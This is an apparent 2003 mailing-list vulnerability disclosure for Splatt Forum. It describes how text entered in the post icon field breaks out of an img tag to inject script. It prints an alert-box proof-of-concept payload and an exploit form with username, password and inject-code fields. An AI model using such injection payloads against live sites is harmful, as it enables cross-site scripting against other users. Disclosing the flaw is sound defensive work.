From: "BlackAngels" To: Subject: Splatt Forum html injection code in post icon Date: Wed, 16 Jul 2003 20:36:59 +0200 [ Vulnerability description] Any user can inject html code when create a new post. The bug is in the post icon : <img src=3D"icon.gif" etc.> If you create a personalized form with this code: icon.gif"><script>alert('bug');<script><anytag=3D" the final code of the post icon is : <imgsrc=3D"icon.gif"><script>alert('bug');<script><a= nytag=3D"" etc.> [ Exploit's code ] =20 Numero forum:
Username:
Password:
Soggetto:
Messaggio:

Inject code: HTML CODE